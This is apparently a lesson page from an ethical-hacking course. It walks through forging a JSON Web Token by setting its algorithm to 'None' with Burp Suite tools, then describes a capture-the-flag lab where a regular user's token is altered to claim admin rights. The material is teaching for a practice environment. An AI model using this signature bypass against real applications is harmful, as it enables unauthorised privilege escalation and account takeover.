"None" Algorithm
One of the "signature algorithms" for JWT is "None", meaning no signature at all. If an application accepts such tokens, even if the developer hasn't considered it, the consequences are catastrophic. A JWT token with "None" as the signature algorithm looks like this:
Step 1 - Obtain Token
Obtain the JWT token that the application gives you. You can see this in Burp's HTTP history when you invoke functions of the application that include the token.
2. Step - Send HTTP request to repeater
Send an HTTP request containing the token to the repeater so that you can send the request again and again, always modifying the token, and see when the application accepts the modified token, indicating a successful attack.
Step 3 - Edit token
Decode the token, change its JOSE header algorithm (alg) value to "None", and reassemble the token. You can do this in a couple of different ways, one option is Hakatemian JWT Studio (Tools -> JWT Studio):
The second option is to use BurpSuite's "JSON Web Tokens" extension:
4. Step - Victory
Once you have assembled a new JWT, replace the token originally present in the HTTP request with it and resend the request.
JWT Verification Bypass - 'None' Algorithm
In this lab, you will be able to perform your first JWT attack. The goal is to log in to the application as a regular user and obtain a token that has the "admin" claim value set to false. Then, using the techniques you have learned in this module, modify the token so that the "admin" claim value is true. Finally, read the flag from the /api/v1/flag endpoint.
Objective
Read the flag from the /api/v1/flag endpoint.
Exercises
Flag
Find the flag from the lab environment and enter it below.
Ready to become an ethical hacker?
Start today.
As a member of Hakatemia you get unlimited access to Hakatemia modules, exercises and tools, and you get access to the Hakatemia Discord channel where you can ask for help from both instructors and other Hakatemia members.